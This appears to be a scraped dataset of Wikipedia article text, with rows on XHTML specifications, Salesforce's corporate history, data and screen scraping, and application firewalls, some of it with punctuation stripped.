55 The second edition of XHTML 1.1 was issued on 23 November 2010, which addresses various errata and adds an XML Schema implementation not included in the original specification. 56 (It was first released briefly on 7 May 2009 as a "Proposed Edited Recommendation" 57 before being rescinded on 19 May due to unresolved issues.) Since information appliances may lack the system resources to implement all XHTML abstract modules, the W3C defined a feature-limited XHTML specification called XHTML Basic. It provides a minimal feature subset sufficient for the most common content-authoring. The specification became a W3C recommendation in December 2000. 58 Of all the versions of XHTML, XHTML Basic 1.0 provides the fewest features. With XHTML 1.1, it is one of the two first implementations of modular XHTML. In addition to the Core Modules (Structure, Text, Hypertext, and List), it implements the following abstract modules: Base, Basic Forms, Basic Tables, Image, Link, Metainformation, Object, Style Sheet, and Target. 59 60 XHTML Basic 1.1 replaces the Basic Forms Module with the Forms Module and adds the Intrinsic Events, Presentation, and Scripting modules. It also supports additional tags and attributes from other modules. This version became a W3C recommendation on 29 July 2008. 61 The current version of XHTML Basic is 1.1 Second Edition (23 November 2010), in which the language is re-implemented in the W3C's XML Schema language. This version also supports the lang attribute. 62 XHTML-Print, which became a W3C Recommendation in September 2006, is a specialized version of XHTML Basic designed for documents printed from information appliances to low-end printers. 63 XHTML Mobile Profile (abbreviated XHTML MP or XHTML-MP) is a third-party variant of the W3C's XHTML Basic specification. Like XHTML Basic, XHTML was developed for information appliances with limited system resources. In October 2001, a limited company called the Wireless Application Protocol Forum began adapting XHTML Basic for WAP 2.0, the second major version of the Wireless Application Protocol. WAP Forum based their DTD on the W3C's Modularization of XHTML, incorporating the same modules the W3C used in XHTML Basic 1.0—except for the Target Module. Starting with this foundation, the WAP Forum replaced the Basic Forms Module with a partial implementation of the Forms Module, added partial support for the Legacy and Presentation modules, and added full support for the Style Attribute Module. In 2002, the WAP Forum has subsumed into the Open Mobile Alliance (OMA), which continued to develop XHTML Mobile Profile as a component of their OMA Browsing Specification. To this version, finalized in 2004, the OMA added partial support for the Scripting Module and partial support for Intrinsic Events. XHTML MP 1.1 is part of v2.1 of the OMA Browsing Specification (1 November 2002). 64 This version, finalized on 27 February 2007, expands the capabilities of XHTML MP 1.1 with full support for the Forms Module and OMA Text Input Modes. XHTML MP 1.2 is part of v2.3 of the OMA Browsing Specification (13 March 2007). 64 XHTML MP 1.3 (finalized on 23 September 2008) uses the XHTML Basic 1.1 document type definition, which includes the Target Module. Events in this version of the specification are updated to DOM Level 3 specifications (i.e., they are platform- and language-neutral). The XHTML 2 Working Group considered the creation of a new language based on XHTML 1.1. 
65 If XHTML 1.2 was created, it would include WAI-ARIA and role attributes to better support accessible web applications, and improved Semantic Web support through RDFa. The inputmode attribute from XHTML Basic 1.1, along with the target attribute (for specifying frame targets) might also be present. The XHTML2 WG had not been chartered to carry out the development of XHTML1.2. Since the W3C announced that it does not intend to recharter the XHTML2 WG, 9 and closed the WG in December 2010, this means that XHTML 1.2 proposal would not eventuate. Between August 2002 and July 2006, the W3C released eight Working Drafts of XHTML 2.0, a new version of XHTML able to make a clean break from the past by discarding the requirement of backward compatibility. This lack of compatibility with XHTML 1.x and HTML 4 caused some early controversy in the web developer community. 66 Some parts of the language (such as the role and RDFa attributes) were subsequently split out of the specification and worked on as separate modules, partially to help make the transition from XHTML 1.x to XHTML 2.0 smoother. The ninth draft of XHTML 2.0 was expected to appear in 2009, but on 2 July 2009, the W3C decided to let the XHTML2 Working Group charter expire by that year's end, effectively halting any further development of the draft into a standard. 9 Instead, XHTML 2.0 and its related documents were released as W3C Notes in 2010. 67 68 New features to have been introduced by XHTML 2.0 included: HTML5 grew independently of the W3C, through a loose group of browser manufacturers and other interested parties calling themselves the WHATWG, or Web Hypertext Application Technology Working Group. The key motive of the group was to create a platform for dynamic web applications; they considered XHTML 2.0 to be too document-centric, and not suitable for the creation of internet forum sites or online shops. 69 HTML5 has both a regular text html serialization and an XML serialization, which is also known as XHTML5. 70 The language is more compatible with HTML 4 and XHTML 1.x than XHTML 2.0, due to the decision to keep the existing HTML form elements and events model. It adds many new elements not found in XHTML 1.x, however, such as section and aside tags. The XHTML5 language, like HTML5, uses a DOCTYPE declaration without a DTD. Furthermore, the specification deprecates earlier XHTML DTDs by asking the browsers to replace them with one containing only entity definitions for named characters during parsing. 70 XHTML RDFa is an extended version of the XHTML markup language for supporting RDF through a collection of attributes and processing rules in the form of well-formed XML documents. This host language is one of the techniques used to develop Semantic Web content by embedding rich semantic markup. An XHTML document that conforms to an XHTML specification is said to be valid. Validity assures consistency in document code, which in turn eases processing, but does not necessarily ensure consistent rendering by browsers. A document can be checked for validity with the W3C Markup Validation Service (for XHTML5, the Validator. nu Living Validator should be used instead). In practice, many web development programs provide code validation based on the W3C standards. The root element of an XHTML document must be html, and must contain an xmlns attribute to associate it with the XHTML namespace. The namespace URI for XHTML is http: www.w3.org 1999 xhtml. 
The example tag below additionally features an xml:lang attribute to identify the document with a natural language: In order to validate an XHTML document, a Document Type Declaration, or DOCTYPE, may be used. A DOCTYPE declares to the browser the Document Type Definition (DTD) to which the document conforms. A Document Type Declaration should be placed before the root element. The system identifier part of the DOCTYPE, which in these examples is the URL that begins with http: , need only point to a copy of the DTD to use, if the validator cannot locate one based on the public identifier (the other quoted string). It does not need to be the specific URL that is in these examples; in fact, authors are encouraged to use local copies of the DTD files when possible. The public identifier, however, must be character-for-character the same as in the examples. A character encoding may be specified at the beginning of an XHTML document in the XML declaration when the document is served using the application xhtml xml MIME type. (If an XML document lacks encoding specification, an XML parser assumes that the encoding is UTF 8 or UTF 16, unless the encoding has already been determined by a higher protocol.) For example: The declaration may be optionally omitted because it declares its encoding the default encoding. However, if the document instead makes use of XML 1.1 or another character encoding, a declaration is necessary. Internet Explorer prior to version 7 enters quirks mode, if it encounters an XML declaration in a document served as text html. XHTML 1.x documents are mostly backward compatible with HTML 4 user agents when the appropriate guidelines are followed. XHTML 1.1 is essentially compatible, although the elements for ruby annotation are not part of the HTML 4 specification and thus generally ignored by HTML 4 browsers. Later XHTML 1.x modules such as those for the role attribute, RDFa, and WAI-ARIA degrade gracefully in a similar manner. XHTML 2.0 is significantly less compatible, although this can be mitigated to some degree through the use of scripting. (This can be simple one-liners, such as the use of document.createElement() to register a new HTML element within Internet Explorer, or complete JavaScript frameworks, such as the FormFaces implementation of XForms.) The following are examples of XHTML 1.0 Strict, with both having the same visual output. The former one follows the HTML Compatibility Guidelines of the XHTML Media Types Note while the latter one breaks backward compatibility, but provides cleaner markup. 55 Example 1. Example 2. Notes: HTML5 and XHTML5 serializations are largely inter-compatible if adhering to the stricter XHTML5 syntax, but there are some cases in which XHTML will not work as valid HTML5 (e.g., processing instructions are deprecated in HTML clarify , are treated as comments, and close on the first , whereas they are fully allowed in XML, are treated as their own type, and close on ? ). 71 |
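The scraped XHTML article above makes one point worth testing in code: a well-formed XHTML page can be handled by a strict XML parser, while ordinary tag-soup HTML needs a lenient parser. A minimal sketch of such a probe, assuming requests, BeautifulSoup, and html5lib are available; the function name is illustrative:

import requests
import xml.etree.ElementTree as ET
from bs4 import BeautifulSoup

def classify_markup(url):
    """Return 'xml' if the page parses as well-formed XML/XHTML,
    otherwise 'html' (needs a lenient parser such as html5lib).
    Note: named entities defined only in a DTD (e.g. &nbsp;) can still
    make the strict parse fail even for valid XHTML."""
    text = requests.get(url, timeout=10).text
    try:
        ET.fromstring(text)                    # strict parse, no error recovery
        return "xml"
    except ET.ParseError:
        BeautifulSoup(text, "html5lib")        # lenient parse always succeeds
        return "html"

# print(classify_markup("https://en.wikipedia.org/wiki/XHTML"))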
29 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Template:Data | A navbox for data-related topics. |
30 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Salesforce.com | Salesforce, Inc. is an American cloud-based software company headquartered in San Francisco, California. It provides customer relationship management (CRM) software and applications focused on sales, customer service, marketing automation, e-commerce, analytics, and application development. Founded by former Oracle executive Marc Benioff in February 1999, Salesforce grew quickly, making its initial public offering in 2004. As of September 2022, Salesforce is the 61st largest company in the world by market cap with a value of nearly US$153 billion. 2 It became the world's largest enterprise software firm in 2022. 3 Salesforce ranked 491st on the 2023 edition of the Fortune 500, making $31,352 million in revenues. 4 Since 2020, Salesforce has also been a component of the Dow Jones Industrial Average. 5 Salesforce was founded in 1999 by former Oracle executive Marc Benioff, together with Parker Harris, Dave Moellenhoff, and Frank Dominguez as a software-as-a-service (SaaS) company. 6 7 Two of Salesforce's earliest investors were Larry Ellison, the co-founder and first CEO of Oracle, and Halsey Minor, the founder of CNET. 7 Salesforce was severely affected by the dot-com bubble bursting at the beginning of the new millennium, resulting in the company laying off 20% of its workforce. Despite its losses, Salesforce continued strong during the early 2000s. Salesforce also gained notability during this period for its "the end of software" tagline and marketing campaign, and even hired actors to hold up signs with its slogan outside a Siebel Systems conference. 8 Salesforce's revenue continued to increase from 2000 to 2003, with 2003's revenue skyrocketing from $5.4 million in the fiscal year 2001 to over $100 million by December 2003. 9 Also in 2003, Salesforce held its first annual Dreamforce conference in San Francisco. 10 In June 2004, the company had its initial public offering on the New York Stock Exchange under the stock symbol CRM and raised US$110 million. 11 12 In 2006, Salesforce launched IdeaExchange, a platform that allows customers to connect with company product managers. 13 In 2009, Salesforce passed $1 billion in annual revenue. 7 Also, in 2009, the company launched Service Cloud, an application that helps companies manage service conversations about their products and services. 14 In 2014, the company released Trailhead, a free online learning platform. 15 In October 2014, Salesforce announced the development of its Customer Success Platform. 16 In September 2016, Salesforce announced the launch of Einstein, an artificial intelligence platform that supports several of Salesforce's cloud services. 17 18 It reportedly acquired a 20 year license to be the exclusive business-oriented software company allowed to use Albert Einstein's likeness for $20 million. 19 In 2020, Salesforce joined the Dow Jones Industrial Average, replacing energy giant and Standard Oil-descendant ExxonMobil. 20 Salesforce's ascension to the Dow Jones was concurrent with that of Amgen and Honeywell. 5 Because the Dow Jones factors its components by market price, Salesforce was the largest technology component of the index at its accession. 21 Across 2020 and 2021, Salesforce saw some notable leadership changes; in February 2020, co-chief executive officer Keith Block stepped down from his position in the company. 22 Marc Benioff remained as chairman and chief executive officer. 
23 In February 2021, Amy Weaver, previously the chief legal officer, became CFO. Former CFO Mark Hawkins announced that he would be retiring in October. 24 25 In November 2021, Bret Taylor was named vice chair and co-CEO of the company. 26 In December 2020, it was announced that Salesforce would acquire Slack for $27.7 billion, its largest acquisition to date. 27 The acquisition closed in July 2021. 28 Journalists covering the acquisition emphasized the price Salesforce paid for Slack, which was a 54% premium compared to Slack's market value. 29 better source needed In April 2022, "Salesforce.com, Inc. changed its legal name to "Salesforce, Inc. 30 In August 2022, Salesforce reported second-quarter earnings of $7.72 billion. Upon the German software firm SAP reporting its earnings for the same quarter totaling 7.52 Billion, a Acceleration Economy reported that Salesforce had surpassed SAP to become the world's largest enterprise software vendor. This mirrored Benioff's remarks in Salesforce's earnings call, where he stated he looked at "this quarter very much as kind of a milestone". 3 Salesforce announced a partnership with Meta Platforms in September 2022. The deal called for Meta's consumer application WhatsApp to integrate Salesforce's Customer 360 platform to allow consumers to communicate with companies directly. 31 In November 2022, Salesforce announced it would terminate employees in its sales organization. 32 Protocol reported that the company would likely eliminate some 2500 jobs. 33 In November 2022, Salesforce announced its co-CEO and vice chair, Bret Taylor, would be stepping down from his roles at the end of January 2023, with Benioff continuing to run the company and serve as board chair. Within the week, former Tableau CEO Mark Nelson and former Slack CEO Stewart Butterfield also announced their departures. When asked about the departures, Benioff stated, "people come and people go"; Salesforce's stock dropped to a 52 week low after Nelson's resignation. 34 35 36 37 In January 2023, the company announced a layoff of about 10%, or approximately 8,000 positions. According to Benioff, the company hired too aggressively during the COVID 19 pandemic and the increase in working from home led to the layoff. The company also reduced office space as part of the restructuring plan. 38 The same month brought an announcement from activist investor Elliott Management that it would acquire a "big stake" in the company. 39 In January 2024, Salesforce announced it was laying off 700 employees (about 1%) of its global staff. 40 In March 2024, Salesforce launched Einstein Copilot: Health Actions, a conversation assistant based on its earlier artificial intelligence platform Einstein. It will help with making appointments, referrals, and gathering patient information. 41 Salesforce offers several customer relationship management (CRM) services, including: Sales Cloud, 42 Service Cloud, 43 Marketing Cloud, 44 and Commerce Cloud and Platform. 44 Additional technologies include Slack. Salesforce's main services are for customer management. Other services include app creation, data integration and visualization, and training. 45 Salesforce Platform (formerly known as Force.com) is a platform as a service (PaaS) that allows developers to add applications to the main Salesforce.com application. 46 failed verification These applications are hosted on Salesforce.com's infrastructure. 
47 Force.com applications are built using Apex, a proprietary Java-like programming language 48 to generate HTML originally via the "Visualforce" framework. Beginning in 2015 49 the "Lightning Components" framework has been supported. The Apex compiler was designed by James Spagnola. 50 As of 2014, the Force.com platform had 1.5 million registered developers according to Salesforce. 51 Launched in 2005, the Salesforce AppExchange is an online app store that allows users to sell third-party applications and consulting services. 52 53 As of 2021, the exchange has over 5,000 apps listed. 54 55 Launched in 2014, Trailhead is a free online learning platform with courses focused on Salesforce technologies. 56 57 15 Desk.com was a SaaS help desk and customer support product that was acquired by Salesforce for $50 million in 2011. 58 59 In March 2018, Salesforce announced that Desk.com would be consolidated with other services into Service Cloud Essentials. 60 Do.com was a cloud-based task management system for small groups and businesses, introduced in 2011, and discontinued in 2014. 61 62 63 Salesforce is headquartered in San Francisco in the Salesforce Tower. 64 Salesforce has 110 offices, including ones in Hong Kong, Israel, London, Paris, Sydney and Tokyo. 65 66 Standard Poor's added Salesforce to the S P 500 Index in September 2008. 67 In August 2020, S P Dow Jones Indices announced that Salesforce would replace ExxonMobil in the Dow Jones Industrial Average. 20 According to Marc Benioff, Salesforce corporate culture is based on the concept of Ohana. 68 In 2021, Cynthia Perry, a design research senior manager, resigned, alleging discrimination in the workplace and posting her resignation letter on LinkedIn. 69 On September 10, 2021, Benioff tweeted that the company is prepared to help any employee who wishes to move out of the state of Texas, following abortion legislation in Texas, announced on September 1, 2021. 70 For the fiscal year 2022, Salesforce reported revenue of US$26.49 billion, an increase of 25% year-over-year and 24% in constant currency. 71 Salesforce ranked 126 on the 2022 Fortune 500 list of the largest United States companies by revenue. 72 In 2008, Salesforce migrated from Sun Fire E25K servers with SPARC processors running Solaris, to Dell servers with AMD processors, running Linux. 74 In 2012, Salesforce announced plans to build a data center in the UK to handle European citizens' personal data. 75 The center opened in 2014. 76 In 2013, Salesforce and Oracle announced a nine-year partnership focusing on applications, platforms, and infrastructure. 77 In 2016, Salesforce announced that it will use Amazon Web Services hosting for countries with restrictive data residency requirements and where no Salesforce data centers are operating. 78 Salesforce has acquired many companies throughout its history. In 2006, Salesforce acquired Sendia, a mobile web service firm, for $15 million 79 and Kieden, an online advertising company. 80 In 2007, Koral, a content management service, was acquired. 81 In 2008, Salesforce acquired Instranet for $31.5 million. 82 In 2010, Salesforce acquired multiple companies, including Jigsaw, a cloud-based data service provider, for $142 million, 83 Heroku, a Ruby application platform-as-a-service, for $212 million, 84 and Activa Live Chat, a live chat software provider. 
85 In 2011, Salesforce acquired Dimdim, a web conferencing platform, for $31 million, 86 Radian6, a social media tracking company, for $340 million, 87 and Rypple, a performance management software company. 88 Rypple became known as Work.com in 2012. 89 In 2012, Salesforce acquired Buddy Media, a social media marketer, for $689 million, 90 and GoInstant, a browser collaboration startup, for $70 million. 91 In 2013, Salesforce acquired ExactTarget, an email marketer, for $2.5 billion. 92 In 2014, Salesforce acquired RelateIQ, a data company, for $390 million. 93 In 2015, Salesforce acquired multiple companies for undisclosed sums, including Toopher, a mobile authentication company, 94 Tempo, an AI calendar app, 95 and MinHash, an AI platform. 96 The company also acquired SteelBrick, a software company, for $360 million. 97 In 2016, Salesforce spent over $5 billion in acquisitions. 98 Companies acquired included Demandware, a cloud-based provider of e-commerce services, for $2.8 billion 99 and Quip, a word processing app, for $750 million. 100 In 2017, the company acquired Sequence, a user experience design agency, for an undisclosed amount. 101 In 2018, Salesforce acquired several companies, including MuleSoft, a cloud service company, for $6.5 billion, 102 103 as well as Rebel, an email services provider, 104 and Datorama, an AI marketing platform, for undisclosed amounts. 105 Between 2019 and 2021, Salesforce made two of its largest acquisitions, with Salesforce completing its acquisition Tableau, a data visualization and analytics software company, for $15.7 billion 106 in 2019, and Slack Technologies, the developers of its namesake office messaging platform, for $27.7 billion in 2021. 107 Salesforce also made smaller acquisitions throughout 2019, 2020, and 2021, which included ClickSoftware for $1.35 billion, 108 consulting firm Acumen Solutions for $570 million, 109 CRM firm Vlocity for $1.33 billion, 22 privacy compliance startup Phennecs for $16.5 million, 110 and robotic process automation firm Servicetrace for an undisclosed amount. 111 Salesforce's most recent acquisition was Slack-bot maker Troops.ai, announced in May 2022, and expected to close in 2023. 112 In September 2023, Salesforce acquired Airkit.ai, a creator of AI-powered customer service applications and experiences. 113 In December 2023, Salesforce announced it would acquire Spiff, an automated commission management platform for an undisclosed amount. 114 In April 2024, the Wall Street Journal reported that Salesforce was in advanced talks to acquire Informatica at a price below its $11 billion market capitalization at the time. 115 The deal was later reported to have been abandoned. 116 In November 2007, a phishing attack compromised contact information on a number of Salesforce customers. Some customers then received phishing emails that appeared to be invoices from Salesforce. 117 118 Salesforce stated that "a phisher tricked someone into disclosing a password, but this intrusion did not stem from a security flaw in the salesforce.com application or database. 117 In 2017, at DEF CON, two security engineers were let go after giving a presentation on an internal project called MEATPISTOL. 119 The presenters were sent a message 30 minutes prior to the presentation telling them not to go on stage, but the message wasn't seen until after they finished. 
119 120 The MEATPISTOL tool was anticipated to be released as open-source at the time of the presentation, but Salesforce did not release the code to developers or the public during the conference. 119 The terminated employees called on the company to open-source the software after being let go. 121 The not-for-profit organization Refugee and Immigrant Center for Education and Legal Services (RAICES) rejected a US$250,000 donation from Salesforce because the company has contracts with U.S. Customs and Border Protection. 122 In December 2019, the Institute on Taxation and Economic Policy found that Salesforce was one of 91 companies who "paid an effective federal tax rate of 0% or less" in 2018, as a result of the Tax Cuts and Jobs Act of 2017. Their findings were published in a report based on the 379 Fortune 500 companies that declared a profit in 2018. 123 In March 2019, Salesforce faced a lawsuit by 50 anonymous women claiming to be victims and survivors of sex trafficking, abuse, and rape. The suit alleges that the company profited from and helped build technology that facilitated sex trafficking on Backpage.com, a now defunct website. 124 In March 2021, a judge granted partial dismissal of the case, dismissing charges of negligence and conspiracy, but allowed the case to proceed regarding charges of sex trafficking. 125 In July 2021, Salesforce Japan faced a discrimination lawsuit from a former employee, according to Japanese legal media. 126 The firm declined to comment on the suit to the media. The ex-employee, who has Autism Spectrum Disorder and ADHD, claimed she was discriminated against because of her disability and terminated in the firm's Japan web marketing team. The suit alleged that the anonymous woman, as an employee at Salesforce Japan from 2018 to 2020, faced hate speech, microaggressions and rejection of reasonable accommodation from the manager. She alleged that her attempts to resolve the problem were met with pressure from HR and job coach. The lawsuit is still continuing in Tokyo district court. 127 128 In Japan, the legal disability quota for private companies is 2.3%. But Salesforce Japan has not met the quota and pay levy from 2009 to 2021 except 2017. In 2020 the firm did not report the number of disabled employees to Japanese labor official. Depending on the result of lawsuit, it is undeniable that the firm may face a risk of negative impact to disability hiring such as performance improvement plan on the disability employment act or disclosure as social punishment from the labor official. 129 In January 2023, Salesforce reported that 8,000 employees had been laid off as a result of over-hiring during the Covid lockdown and a global economic downturn. In March 2023, the Wall Street Journal reported that actor Matthew McConaughey was paid 10 million dollars yearly for his role as a "creative advisor and TV pitchman". American musician will.i.am was also cited to be on the company's payroll due to his "strong understanding of technology". 130 131 In 2009, Salesforce began investing in startups. 132 These investments became Salesforce Ventures, headed by John Somorjai 132 133 In September 2014, SFV set up Salesforce1 Fund, aimed at start-ups creating applications primarily for mobile phones. 134 In December 2018, Salesforce Ventures announced the launch of the Japan Trailblazer Fund, focused on Japanese startups. 
135 In August 2018, Salesforce Ventures reported investments totaling over $1 billion in 275 companies, including CloudCraze (e-commerce), 136 Figure Eight (artificial intelligence), 137 Forter (online fraud prevention), 138 and FinancialForce (automation software). 139 In 2019, SFV's five largest investments—Domo (data-visualization software), SurveyMonkey (online survey software), Twilio (cloud-communication), Dropbox (cloud storage), and DocuSign (secure e-signature company)—accounted for nearly half of its portfolio. 140 In 2021, Salesforce announced that its investments had resulted in $2.17 Billion annual gain. 141 In June 2023 Salesforce increased the size of its Generative AI Fund for startups from $250 million to $500 million. 142 |
31 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20160305025808/http://www.thefreelibrary.com/American+Airlines,+FareChase+Settle+Suit.-a0103213546 | Page Link: Terms of use Copyright 2016 Farlex, Inc. Feedback For webmasters |
33 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-1 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
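The passage above boils web scraping down to its core loop: take a URL, pull out the human-readable text, and store it for later analysis. A minimal sketch of that loop, assuming requests, BeautifulSoup (html5lib), and pandas; the whitespace clean-up, delay, and column names are illustrative placeholders rather than the pipeline's actual rules:

import re
import time
import requests
import pandas as pd
from bs4 import BeautifulSoup

def scrape_paragraph_text(url):
    """Fetch a page and return its paragraph text as one cleaned string."""
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    soup = BeautifulSoup(response.text, "html5lib")
    text = " ".join(p.get_text(" ", strip=True) for p in soup.find_all("p"))
    return re.sub(r"\s+", " ", text)           # illustrative whitespace normalisation only

def scrape_to_dataframe(urls, delay=2.0):
    """Scrape each URL with a small delay and collect the results in a DataFrame."""
    rows = []
    for url in urls:
        try:
            rows.append({"URL": url, "Scraped Text": scrape_paragraph_text(url)})
        except requests.RequestException as e:
            rows.append({"URL": url, "Scraped Text": f"ERROR: {e}"})
        time.sleep(delay)                       # keep the request rate modest
    return pd.DataFrame(rows)

# df = scrape_to_dataframe(["https://en.wikipedia.org/wiki/Data_scraping"])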
35 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Articles_needing_additional_references_from_February_2011 | This category combines all articles needing additional references from February 2011 (2011 02) to enable us to work through the backlog more systematically. It is a member of Category:Articles needing additional references. The following 200 pages are in this category, out of approximately 1,225 total. This list may not reflect recent changes. |
36 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Application_firewall | An application firewall is a form of firewall that controls input output or system calls of an application or service. It operates by monitoring and blocking communications based on a configured policy, generally with predefined rule sets to choose from. The two primary categories of application firewalls are network-based and host-based. Gene Spafford of Purdue University, Bill Cheswick at AT T Laboratories, and Marcus Ranum described a third-generation firewall known as an application layer firewall. Marcus Ranum's work, based on the firewall created by Paul Vixie, Brian Reid, and Jeff Mogul, spearheaded the creation of the first commercial product. The product was released by DEC, named the DEC SEAL by Geoff Mulligan - Secure External Access Link. DEC's first major sale was on June 13, 1991, to Dupont. Under a broader DARPA contract at TIS, Marcus Ranum, Wei Xu, and Peter Churchyard developed the Firewall Toolkit (FWTK) and made it freely available under license in October 1993. 1 The purposes for releasing the freely available, not for commercial use, FWTK were: to demonstrate, via the software, documentation, and methods used, how a company with (at the time) 11 years experience in formal security methods, and individuals with firewall experience, developed firewall software; to create a common base of very good firewall software for others to build on (so people did not have to continue to "roll their own" from scratch); to "raise the bar" of firewall software being used. However, FWTK was a basic application proxy requiring the user interactions. In 1994, Wei Xu extended the FWTK with the Kernel enhancement of IP stateful filter and socket transparent. This was the first transparent firewall, known as the inception of the third generation firewall, beyond a traditional application proxy (the second generation firewall), released as the commercial product known as Gauntlet firewall. Gauntlet firewall was rated one of the top application firewalls from 1995 until 1998, the year it was acquired by Network Associates Inc, (NAI). Network Associates continued to claim that Gauntlet was the "worlds most secure firewall" but in May 2000, security researcher Jim Stickley discovered a large vulnerability in the firewall, allowing remote access to the operating system and bypassing the security controls. 2 Stickley discovered a second vulnerability a year later, effectively ending Gauntlet firewalls' security dominance. 3 Application layer filtering operates at a higher level than traditional security appliances. This allows packet decisions to be made based on more than just source destination IP Address or ports and can also use information spanning across multiple connections for any given host. Network-based application firewalls operate at the application layer of a TCP IP stack 4 and can understand certain applications and protocols such as File Transfer Protocol (FTP), Domain Name System (DNS), or Hypertext Transfer Protocol (HTTP). This allows it to identify unwanted applications or services using a non standard port or detect if an allowed protocol is being abused. 5 Modern versions of network-based application firewalls can include the following technologies: Web application firewalls (WAF) are a specialized version of a network-based appliance that acts as a reverse proxy, inspecting traffic before being forwarded to an associated server. 
A host-based application firewall monitors application system calls or other general system communication. This gives more granularity and control, but is limited to only protecting the host it is running on. Control is applied by filtering on a per process basis. Generally, prompts are used to define rules for processes that have not yet received a connection. Further filtering can be done by examining the process ID of the owner of the data packets. Many host-based application firewalls are combined or used in conjunction with a packet filter. 6 Due to technological limitations, modern solutions such as sandboxing are being used as a replacement of host-based application firewalls to protect system processes. 7 There are various application firewalls available, including both free and open source software and commercial products. Starting with Mac OS X Leopard, an implementation of the TrustedBSD MAC framework (taken from FreeBSD), was included. 8 The TrustedBSD MAC framework is used to sandbox services and provides a firewall layer, given the configuration of the sharing services in Mac OS X Leopard and Snow Leopard. Third-party applications can provide extended functionality, including filtering out outgoing connections by app. This is a list of security software packages for Linux, allowing filtering of application to OS communication, possibly on a by-user basis: These devices may be sold as hardware, software, or virtualized network appliances. Next-Generation Firewalls: 